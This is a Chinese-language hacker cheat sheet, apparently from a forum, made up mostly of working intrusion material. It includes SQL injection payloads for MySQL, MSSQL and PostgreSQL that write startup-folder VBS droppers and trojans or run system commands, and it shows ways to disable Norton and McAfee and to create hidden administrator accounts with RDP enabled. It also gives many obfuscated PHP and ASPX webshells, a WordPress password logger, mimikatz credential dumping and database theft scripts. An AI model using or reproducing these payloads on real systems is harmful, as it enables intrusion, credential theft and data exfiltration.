) O' \; B. ~6 K/ x中文版本操作系统中针对mysql添加用户完整代码:9 \5 b2 F4 c9 s3 m- \) n
8 Q, i+ x _# X/ d
use test;
7 B/ s) h8 ?# }' B( ^/ L9 D$ acreate table a (cmd text);* O9 A# H3 c. k) o. L
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
; y. C! j6 J3 ginsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
4 ^, _8 N0 _, `insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );: u! z U) q" F& i) o& A) J' V) }9 S" s" G
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";1 m, K" N. g" F& n) g0 @
drop table a;/ g; A' N, R4 g$ N9 a# w+ s4 [
" G6 n+ u0 B9 }; d8 q: x
英文版本:
- V' t/ j4 l1 f5 F. z9 _- R4 j4 ?
; v# R' c: u8 duse test;
( U/ x; R# Z3 v5 F: ycreate table a (cmd text);
% _# r2 F; Z7 ninsert into a values ("set wshshell=createobject (""wscript.shell"") " );
6 v ~/ p5 j% N; x# x+ pinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );" _+ @7 k; x6 K& C0 D. T
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );$ }8 M% u6 f6 g0 ~
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";2 k0 K9 O( v( m& i) I4 ]! g) ^
drop table a;
" f" z* B0 J2 c! R M7 W+ y: \: c
) E1 U5 O/ C3 n2 n6 Gcreate table a (cmd BLOB);
! z& r/ d4 j; m2 v4 Winsert into a values (CONVERT(木马的16进制代码,CHAR));
5 B8 d; q1 F2 ^- `& J/ {select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
' f% X# |5 Y8 X( k5 x+ _* B# z3 kdrop table a;3 d: ?: r3 u3 M
9 M/ O4 {/ L% q, ?+ G r
记录一下怎么处理变态诺顿
& T/ D- h5 _. K r& {: r' w+ k/ f3 J查看诺顿服务的路径! I6 g5 X3 j0 R, b
sc qc ccSetMgr/ f, @. Y) R" \) P
然后设置权限拒绝访问。做绝一点。。4 D. z2 ?7 {/ `: g" G
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system- L- C7 n0 U& K- B% J- ~
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"' y& _5 o1 F; V
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
x4 r3 h! O9 D7 I+ A4 @cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
. ]* [+ M( F( |+ l' F6 Q2 K! s2 Z) i7 i
然后再重启服务器
% X X& }5 M# r4 I5 ^! g8 @iisreset /reboot3 B3 d0 ~3 e- @3 `6 [& y
这样就搞定了。。不过完事后。记得恢复权限。。。。- v* l* Y* ]4 x- T) \% W
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
, h$ A. k/ L7 e( K; n9 }9 P' jcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
4 m! r7 q4 j9 H; P* b# i1 @) c- Kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F; l9 Z u M0 ?( m o) B
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F0 a+ ]" s( R* x3 v' L' w5 v
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin/ `9 _# v+ E! n, f$ K
0 @- Q2 S1 H6 d3 z( sEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''') w' Z* R; ]' o' K% {: \! d
9 U7 V; b4 A; V$ H L5 U5 \
postgresql注射的一些东西2 z b" U, Y* J( k
如何获得webshell
8 W5 f/ Z6 V! c1 z; i" }7 Thttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); 9 e2 j5 ]" Q% d7 h' w
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
9 _- V9 o# J% r, khttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;1 E ^4 |! n% Q' }
如何读文件
/ `& O; O0 g) v; i5 j& ihttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
* X* s: X/ i" b' a% [" {9 \7 c/ whttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;8 S9 b) V# E$ k% X/ I
http://127.0.0.1/postgresql.php?id=1;select * from myfile;
- [, W# u3 B1 W3 G$ e* C- m; ~# b' Q/ F& m& C0 z( ^
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
- n6 H. I( ]8 Q' z. R7 g% Q当然,这些的postgresql的数据库版本必须大于8.X" w' Q& g& ~" n# Q0 D
创建一个system的函数:( o8 p. E H* @; ]. s
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
" } {, N/ L4 ]& F
% q% O! H& b: y5 Y( G- v创建一个输出表:
- }( c. v1 i2 E8 D. J3 KCREATE TABLE stdout(id serial, system_out text)
8 \, C5 d. m# R! ^6 e( }# c2 t5 _) d+ I: ]8 u7 U1 l3 [
执行shell,输出到输出表内:& x/ u4 x f$ Y* j( N( ^
SELECT system('uname -a > /tmp/test'). |6 o3 M0 O7 A4 E0 }5 N: l: m
, A% F' f( q9 P, x9 \ \copy 输出的内容到表里面;6 w9 i$ t' b* l- T! A5 ?
COPY stdout(system_out) FROM '/tmp/test'" g1 t) Y- m7 y( A9 h. k3 X
7 E* |2 ^* D) |5 w/ M从输出表内读取执行后的回显,判断是否执行成功
% C8 m% z; m; z# N5 q
/ F# S8 t! {8 A+ Q; nSELECT system_out FROM stdout
8 F& @6 w. H$ ^6 {+ ]) v下面是测试例子0 X1 i) {$ v3 q$ D+ Y8 a
% T2 b. x, h- B0 e0 S8 T: ~: k/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 0 @9 {8 r0 \/ F! ^. K# ~
7 |5 `5 l) _% z
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
' Y2 [ K V) v) USTRICT --
- J0 \3 ]3 v/ t. q. W; A$ `
1 m9 ~5 L1 _5 P+ T9 `6 s6 m4 _) x/store.php?id=1; SELECT system('uname -a > /tmp/test') --5 y/ Y; I* H7 h
, Z7 t& t& `! D6 l/ l
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --% ~0 J: _- o: F
* M% a2 D! C8 l/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
# A6 ]# e+ E# N. H7 mnet stop sharedaccess stop the default firewall Y. G3 t# v( A. ^
netsh firewall show show/config default firewall5 b4 b6 i! l- v; j) l
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall- H; s c, r8 [# ~0 f! J
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
- |) Q+ \' I- h7 s, n) g修改3389端口方法(修改后不易被扫出)7 l" T. y; x! Y4 d% x7 Q' B
修改服务器端的端口设置,注册表有2个地方需要修改
" v" F8 p" \( ~4 G8 N* `7 F0 C1 V y
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
! k2 h( O! I* @5 t& W! u }PortNumber值,默认是3389,修改成所希望的端口,比如6000
3 }, c0 Q; Y, \! M6 k% u B9 D
) O- p# W0 H/ x8 X第二个地方:
0 N! ?* e( J' j( X0 j* Z- n[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] ( n* o" v6 s' a% N
PortNumber值,默认是3389,修改成所希望的端口,比如6000
' h6 b# u$ t5 T" f$ w0 `
: Y5 I' g, o: R6 @! K+ V7 o. u现在这样就可以了。重启系统就可以了
& `$ {( Z2 x% H# X- y- U$ p7 F9 G5 P. a% P+ Q' p/ n
查看3389远程登录的脚本2 ~, E3 ~$ T) D# k+ ]
保存为一个bat文件
0 j+ N5 U6 o& t4 Bdate /t >>D:\sec\TSlog\ts.log8 S' C/ _$ ]; \) x* I
time /t >>D:\sec\TSlog\ts.log3 h1 H! m7 x; A: Q& V/ x
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log) t% X y( T+ ^
start Explorer5 \/ R0 P; L2 m6 m
, @$ C2 z& T( j7 F; i6 i& Z7 _8 Ymstsc的参数:
& R2 D" y! V5 t2 s/ v' G
/ _7 H- X% c& A. I8 y远程桌面连接4 P5 \- X; m7 a: ]+ M6 Z
, z9 m" k: i8 {' `) I7 h3 W
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]. |" x! C7 _; N2 m ~- {$ {
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
8 K" s/ ^# t. }4 _2 C ~$ Y
* c% N5 c& V5 h, I<Connection File> -- 指定连接的 .rdp 文件的名称。
7 w2 G+ b9 r" u" L5 b4 Q) T2 p1 X6 q. q. V; F' n P
/v:<server[:port]> -- 指定要连接到的终端服务器。
3 L V8 ?; i) O2 T0 I7 z0 N& Q/ p- K! _9 X+ `. ]! \
/console -- 连接到服务器的控制台会话。
/ v2 L# R- c8 Z$ M! r* S0 N, p9 Z, t
/f -- 以全屏模式启动客户端。1 H: H! [/ D# ]9 B' X, Q. W0 Z: {
, F% M6 Q3 Z% L1 d$ Y, Y& X% }
/w:<width> -- 指定远程桌面屏幕的宽度。* {8 v0 \/ W1 v# [+ y( \" k# B8 D
1 H" ^, a" Q3 e! j" y3 K' [
/h:<height> -- 指定远程桌面屏幕的高度。4 Z v5 \9 z! p4 X+ A
, Y0 S. Y. Y: o0 q
/edit -- 打开指定的 .rdp 文件来编辑。8 L6 C+ `7 M% r6 Q
8 Y a' d5 w F" G5 m3 V. V/migrate -- 将客户端连接管理器创建的旧版1 I+ K' u) i; v5 o
连接文件迁移到新的 .rdp 连接文件。8 B; M( A! ~) }+ r
: I* u, p5 b7 A8 o2 ]0 x0 R ?
! z" e, E6 d* F+ b* l% h$ Z6 ~
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就. O1 ^2 _3 ]8 m6 f. X
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量
/ M" o3 I& B& u) z: n, o, P2 R8 V& Z
9 q: \4 D( o. O命令行下开启3389+ @& t$ R: Z" o& h: `. p. _$ ?
net user asp.net aspnet /add2 m5 q/ ?- H1 ?+ B: [9 i7 _
net localgroup Administrators asp.net /add) a& Y/ F. u3 V1 Z$ d
net localgroup "Remote Desktop Users" asp.net /add% k9 Y, i' ~6 j4 v3 X$ U
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
7 U4 p3 ?" M+ O7 @6 s; l, secho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
9 ^4 n$ r! ]0 e; E4 n2 K, Lecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
/ f* Y1 P6 X) D3 w; f7 h( Z7 fecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f2 X! ~# h. m! A! U' A7 {; {
sc config rasman start= auto
{' ~( ^& H& j" m" \4 {2 lsc config remoteaccess start= auto
$ ?( c9 O! Y6 l: Qnet start rasman. m; p/ o/ [" P6 g9 F o
net start remoteaccess
; W5 O5 _& q5 RMedia
X) [( |! t& e: P2 X t$ g3 {<form id="frmUpload" enctype="multipart/form-data"
6 O2 p9 Q/ Q. \* D7 Laction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>% v3 v' k) R% r; t
<input type="file" name="NewFile" size="50"><br>
, J+ j/ {: t, q6 H<input id="btnUpload" type="submit" value="Upload">
( H. ~+ F: L8 C+ _: U' {5 C4 _</form>
4 G, B' D3 z( Y/ _& E0 Q9 N" l) C: u( w7 w3 a6 P
control userpasswords2 查看用户的密码3 S0 k9 T8 [* [
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
$ \) s, c9 O3 G8 |6 N6 A% {SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a9 Z7 @3 O$ y1 X! q- b( g w/ L
; b# \6 D2 `' N: f0 S% E141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:5 \+ b) ]/ z" G
测试1:
$ r* j, i3 V9 bSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1; Z" k7 B7 x1 g/ C5 y# v: A# o5 _( m
, h% e' y& f- Q7 t$ A/ ?+ P. u测试2:
" y5 r' E; L' }) h& o
v8 F) k" Q) @2 _create table dirs(paths varchar(100),paths1 varchar(100), id int); b/ z A, ]6 y. L& U! p
+ C, s! p, L" s/ H: D/ T7 r |4 x
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--$ A& \3 d7 J$ d; I, G0 y8 U
/ t% I5 q0 X1 o& m* A; N; y
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
2 C u% i; M- r# V4 x7 `0 u) [关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
?4 E- F4 v8 O4 M S4 X可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
: E. g7 m( {# c- L$ i, x7 qnet stop mcafeeframework
8 t2 G5 Y L1 P& I8 t% Znet stop mcshield z" I4 \( O, f) ?9 ^7 A
net stop mcafeeengineservice
5 a! r9 H" ]! y0 E$ Snet stop mctaskmanager' D/ Y$ s6 |5 ?1 w/ X* p" z
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D7 Y, k8 K% }5 q3 z( l
8 U1 Y1 R7 K, Z9 A
VNCDump.zip (4.76 KB, 下载次数: 1)
7 w. |) g0 e2 L1 X X密码在线破解http://tools88.com/safe/vnc.php
5 f3 t. H1 @# P, V; ~VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取! W8 p+ O! }% k1 s
& K$ h7 X' d- q: E
exec master..xp_cmdshell 'net user'
! T& h5 v2 O1 X3 o8 omssql执行命令。" y$ }- W( _6 q& s. a
获取mssql的密码hash查询3 _! x; q+ A* b+ m
select name,password from master.dbo.sysxlogins
( x0 O9 i: R( P( Y" S2 p9 B8 g1 l" q8 J5 L# j4 k7 V
backup log dbName with NO_LOG;
" l7 k" b* C# u5 nbackup log dbName with TRUNCATE_ONLY;
% }+ {, P$ p3 x* y! ^$ f1 n dDBCC SHRINKDATABASE(dbName);
+ N; p6 k* Y) Z9 x5 B+ Dmssql数据库压缩
0 |/ _ R, y; P5 h+ d" X+ l
Z5 K7 y4 U& o( |7 ]Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK$ a1 ~0 j/ g% E# e* M ~' t
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
! }, c; S" H- _1 O
4 e- c. X& K; w$ i+ tbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
' h- L( M9 N# a备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
, d# O9 }9 J% `
1 _- p# \$ c" d q m2 DDiscuz!nt35渗透要点:
* X) R0 [6 S! G( a0 \(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
, U/ ]% L+ y7 S(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
% r# ]. M3 v. T0 Z! ]3 Q3 m(3)保存。
* V6 f5 u- k9 ]( f0 d/ a2 I) \(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
" }: M E( t. X6 kd:\rar.exe a -r d:\1.rar d:\website\
0 v/ Y4 h1 ], K递归压缩website
N2 ~# h6 r U6 G注意rar.exe的路径. M4 a4 l ]& [& [! b# m
' x" d" _. D/ m; z) d! ]& ?' a<?php
' }6 O5 m/ X* u& Z4 A* i4 v% o/ O: ^' ~$ r1 L6 a6 Q5 }
$telok = "0${@eval($_POST[xxoo])}";; A/ d# r+ H& f( ]0 d/ b
4 `7 m9 k: V* v# f* V# k
$username = "123456";
. n* O5 O+ ^ C3 N2 u8 T S
! e" Z' m; F) r3 S$userpwd = "123456";; X7 V9 M; t; t8 T; ^, S( S- E
5 ]+ O' p" P" f6 K1 i" @. t
$telhao = "123456";
9 `1 ?6 ]( Z( t6 C# [+ g+ q
0 y( Q* p& s h% k4 l$telinfo = "123456";
( w6 j. H7 _9 j6 a& @9 r5 W5 o2 B" O5 [+ ^3 V
?>& J5 A! }. Q; Y( C. m
php一句话未过滤插入一句话木马
) T/ P& r( |0 k3 I
) @& z5 e/ v) o: k3 u1 C站库分离脱裤技巧) H/ ~; ?, h0 T" H8 g
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'4 T5 _' T7 X0 f1 p" E4 B
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
/ ?- a" u1 Q6 v% F4 J6 }/ w# ~条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。, z3 |; N" N7 r
这儿利用的是马儿的专家模式(自己写代码)。
' E. V5 {# `2 C5 c9 mini_set('display_errors', 1);
+ X# d y7 C" R) C) b; e5 A Gset_time_limit(0);& E& S/ n3 b# \) f& p" E
error_reporting(E_ALL);
/ N* s$ I( Y/ ^5 p, y5 Q1 ~$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());; o7 w4 g T# ]( R
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
* F ]( y" i/ z$ F" G# C& L ?$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());0 i3 L0 r% \' M1 a+ u" h6 S
$i = 0;
, l3 T: r; C3 }: V% x6 h$tmp = '';- u( c) d _. o, q8 ~
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
0 u. E% K3 j! M" K $i = $i+1;
9 r1 `4 a2 y& ~$ l2 h3 E# T4 m $tmp .= implode("::", $row)."\n";
2 V2 k, E: t8 E" g if(!($i%500)){//500条写入一个文件. i- `' Y5 Z! E9 m$ z; p/ n
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';( S5 g- g8 Y* b# Q. u K/ Z, ^
file_put_contents($filename,$tmp);2 H: t$ C d1 P! d' C, K& H3 i
$tmp = '';0 \- D. t, l- Z A6 l
}) K" K# ^8 Z) f* j
}+ W0 F" h; ?" o+ V& _
mysql_free_result($result);
; E1 K) C6 z) p4 M! R. E1 T) Z* l& r0 M
# O8 ^' o0 d# k3 ~
0 z; m$ _9 `# k1 O//down完后delete
" |5 p1 h& L* f0 y! t a" V, f- n
) a& }2 `$ j$ a8 N6 h; ?3 E tini_set('display_errors', 1);8 X- M$ d% H- B8 y$ A7 \
error_reporting(E_ALL);; o2 U$ Y o+ @
$i = 0;
3 u6 p# r; s zwhile($i<32) {
/ F# E7 \% K8 [% l/ Y $i = $i+1;3 }; }* n; q0 P7 G
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
) b1 V) v' o+ c/ J% J2 | unlink($filename);
; D- P4 u0 P3 X; j" K" u) w} 4 b, p& Y/ _1 |/ |' r9 H
httprint 收集操作系统指纹 b( m% V# J) m3 l- \
扫描192.168.1.100的所有端口
( j9 T+ a& I$ g: E! y) Ynmap –PN –sT –sV –p0-65535 192.168.1.1006 X% U2 A4 ^7 D, k+ O
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
, v/ n9 c1 K1 `# {host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输8 l& U( n/ l8 y: }5 T i" ~/ o/ q
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
$ p5 y" @1 U, |+ Q+ u8 n& R
! S1 A I M- kDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
: B f c! G ^& r R# J( x
* ?, g* |; r9 Q4 W0 M5 x MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)
$ ~1 T1 u+ \+ T" y
( p0 g8 X) h9 x8 h0 P$ O0 n5 S Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x4 b3 I! H& g6 R( u8 {* @* q
% T4 O5 u2 B, |
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
2 ]/ t3 S8 z8 z: c# w! O& Z+ A2 v% F0 d3 W4 }1 z) t6 e
http://net-square.com/msnpawn/index.shtml (要求安装)
; |& w3 x1 Z7 D9 J; o( C; r' ]. Y0 `# }; x" n3 u! h0 l$ i
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
. z( {2 J. \, {' c( M
7 y. U' E$ o' V+ N/ p% U" Q4 W SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)! K4 i; B! [. d3 t P/ u7 ^2 E+ i8 M
set names gb2312
. L( r h7 t$ O8 D导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
9 d3 `0 |3 K! j( K, k4 v. [; \0 R1 O" a2 Y) U, c& J' c; x
mysql 密码修改+ {7 o' P5 b F/ O5 N
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ” 4 \5 n# q: Q2 C, x7 v8 Z4 R
update user set password=PASSWORD('antian365.com') where user='root';8 d# \4 n' H+ |$ p. f
flush privileges;
}( A& q7 T9 |' P, z8 v高级的PHP一句话木马后门/ y! P0 q, S6 o5 n' M- n( B
" J! T+ H2 E1 |3 `入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
) V/ d3 B3 }$ X- b. I0 i% j' g. F. f3 G8 d- @2 ?
1、
8 l% N8 }8 k% W/ U8 G1 ~3 ? d5 d- l9 u. m5 Q3 k
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";" J$ S: q3 d7 X5 v
7 K5 A2 E( H8 h+ r' |$hh("/[discuz]/e",$_POST['h'],"Access");
) [- k( A6 B, P- _7 s+ }1 D
% g8 G3 H( z0 n//菜刀一句话
. d, g: p9 U/ O }2 x# b6 g8 H: c- q1 N5 s) Y: t
2、3 L0 K# |2 H+ z6 `
2 c# {6 O3 `* y! m5 I2 F* m
$filename=$_GET['xbid'];! c6 e) N4 d" j/ V; T1 c
( |( ^3 h% p# F* Z( a5 @
include ($filename);: `& P: Z) r, \+ n$ ~2 r6 Z
2 B5 e/ [# A( h' y//危险的include函数,直接编译任何文件为php格式运行9 x* G* ~# R/ v6 y8 z) V# G+ `
' m6 ?( B/ a* ^& c* S* f* \3、( I! ^! I# f `/ e/ c
' P& d% M7 E9 O8 R! q/ P$reg="c"."o"."p"."y";
" ~) `! i, \5 `$ _- |
9 G4 l6 C+ A% k. O. I$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);, v! o# N, M3 I8 o
* @% B' y) a8 u$ U( [: D$ r
//重命名任何文件+ _8 o/ ^' c" y5 }$ n
. B1 Z! Y d7 ^$ m; k* }7 C5 @ H$ n* w
4、
& n! x% G" y. l
4 I2 @) I6 G( |) w) u! d$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";0 z! f/ {5 d/ @- a8 h
! E5 y# o: ?1 W6 R
$gzid("/[discuz]/e",$_POST['h'],"Access");
) ?* Y' K5 y Z* B* O: N6 ?6 u1 W
//菜刀一句话) t2 a# a- e' g; Z
g/ N% X7 ^- T- F' |( d0 D5、include ($uid);* C: a: K& R; s& Y# T
1 ?$ _) c8 B. j. |4 ^0 G% A. S0 g2 f//危险的include函数,直接编译任何文件为php格式运行,POST & V4 l$ m! n. G
! P8 |7 s7 P5 i' d) f
! g. O8 |, k- u+ [8 J _; I
//gif插一句话
6 [, N8 V% ^: E- n( w- ^: v% V( F3 r) B
6、典型一句话
8 m0 x( {, Q5 L) s6 V% A: x$ m3 ]3 v# }/ E9 C! K$ h h* [
程序后门代码
* }- W6 U$ q3 f<?php eval_r($_POST[sb])?>
# @" ^, H$ R; m程序代码2 q r2 `: L M% @- P! S5 \4 b" C
<?php @eval_r($_POST[sb])?>
& W6 G8 ]8 Q% u: b' R& X( a//容错代码! q* D' Y P; _7 y; c6 W
程序代码
7 R- u5 M& F4 }% U5 y' w2 g<?php assert($_POST[sb]);?>" o& s7 J8 @4 _0 D
//使用lanker一句话客户端的专家模式执行相关的php语句
$ e# J3 b2 D: _6 X" D程序代码/ y4 s6 ?/ u! d7 b1 d
<?$_POST['sa']($_POST['sb']);?>" N& V+ B f3 U8 t
程序代码' J! Q- g& l8 i
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?> n! d: \4 p2 [! B [
程序代码- `5 q$ o3 j2 f5 `6 r
<?php
. @4 s2 W, p& p0 B% A@preg_replace("/[email]/e",$_POST['h'],"error");
# Q' `0 ~ C' u, m% O( }) c?>/ f& ?( f' a" ?" l( a# i7 p& c U
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
2 C9 y6 J! o# ]+ |程序代码
* y: S* V; _6 h" x/ w; u; d<O>h=@eval_r($_POST[c]);</O>5 A# x& P' Q- F
程序代码2 C' j7 \9 Q; _4 Z3 F* Z4 e g
<script language="php">@eval_r($_POST[sb])</script>" Z4 k1 R- R5 V+ q7 I4 D) Y, c
//绕过<?限制的一句话) U) H4 V$ S' c" ~$ ]- X. r
' Q0 Z1 `/ H E5 e4 B5 }# F& E+ y
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip6 G* J$ {, Z5 I) B8 O$ s& a$ ?! U
详细用法:
% B8 ^- L* z( h2 H7 c1、到tools目录。psexec \\127.0.0.1 cmd
! W' |. Q. b8 b& e6 v, c0 z2、执行mimikatz
0 O) T7 i2 b) z" B% c3、执行 privilege::debug
* k5 l5 Z' k* z% h% w* U$ u4、执行 inject::process lsass.exe sekurlsa.dll
! g9 \6 o! n2 p* I% z! t5、执行@getLogonPasswords; p7 D+ |; O' Q
6、widget就是密码
8 I, N6 C# j4 `! W9 a. ?7、exit退出,不要直接关闭否则系统会崩溃。# K3 ?8 B# C* N4 Q5 k; N
5 Z$ Q* Y8 A }; Jhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
# [ U% c. r* B) |: D. p, ^* d) V$ e0 n& n+ B4 r
自动查找系统高危补丁
0 U* M$ ^& C0 i2 C. ~& osysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
$ i8 {! |7 ^8 T, G5 A3 e- w; C* p. }) S1 G' o! m2 R8 L
突破安全狗的一句话aspx后门* X1 ]# V" _# Q& W, A
<%@ Page Language="C#" ValidateRequest="false" %>: C* l e/ n6 K$ m' p; L5 d
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
" N0 [. P1 I) |1 F2 gwebshell下记录WordPress登陆密码
& o0 L% V" G& y1 ]- [webshell下记录Wordpress登陆密码方便进一步社工
0 E: q8 a( n& d& v1 ~在文件wp-login.php中539行处添加:% e4 K8 z# |& o* t- Y7 {+ I
// log password: ^0 U% i' l# h$ T+ I
$log_user=$_POST['log'];
) t2 R1 z/ i3 {1 Q$log_pwd=$_POST['pwd'];1 C% ^4 U1 [( }/ c* y" c
$log_ip=$_SERVER["REMOTE_ADDR"];" }& i7 e) i: y' w h8 t
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;7 ?7 V0 a/ E: E2 ]
$txt=$txt.”\r\n”;
4 b2 y4 F0 Y' j: A/ mif($log_user&&$log_pwd&&$log_ip){
* \8 o! w' V6 ^@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
2 `: i$ ?3 Q1 }0 T9 }7 z# l" H}
; R" ~& z5 G' s% T! J4 Z6 y8 d* T- C当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。' r6 d/ N) [7 v! d* F9 \
就是搜索case ‘login’& q! {0 |- q, V4 c& |; c
在它下面直接插入即可,记录的密码生成在pwd.txt中,
9 Z. d. w- Q4 t9 t" u- r/ j; m其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录
